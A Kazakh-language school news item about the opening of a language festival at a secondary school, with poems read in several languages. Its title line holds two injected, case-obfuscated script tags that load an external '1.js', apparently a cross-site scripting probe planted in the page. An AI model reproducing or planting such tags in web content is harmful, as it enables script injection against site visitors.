«Мемлекеттік тіл- Қазақстан халықтарын біріктіретін тіл”<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

16.09.2023 #Қазақстан халқы тілдер мерекесіне орай 6 -қыркүйек күні Иманжүсіп Құтпанұлы атындағы орта мектебінде қазақ тілі мен әдебиеті пән мұғалімдері Бақытжан Ботагөз бен Алкеева Айгерімнің ұйымдастыруымен «Мемлекеттік тіл- Қазақстан халықтарын біріктіретін тіл” тақырыбында тілдер онкүндігінің ашылуы өтті. Мақсаты: Тәуелсіз елімізде өмір сүріп жатқан өзге ұлт өкілдері арасындағы достық пен бірлікті нығайту барысында мемлекеттік тілге құрмет сезімдерін қалыптастыру. Тілдер мерекесі бұл - барша елге ортақ, жалпы халықтық, мереке, барлық ұлт өкілдеріне көрсетілген құрмет. Тіл - адам ойы мен санасының жемісі, жаратылыстың аса күрделі көрінісі, қыры мен сыры мол қатынас-құралы. Шара барысында оқушылар әр тілде өлеңдер оқыды. ДОТІЖО Хусайн Ханат Хусайнұлы оқушыларды онкүндік аясында өтетін барлық іс-шараларға белсене қатысуға шақырды.
Просмотров: 972


Пікір қосу



Деректерді қолтаңбаға қосу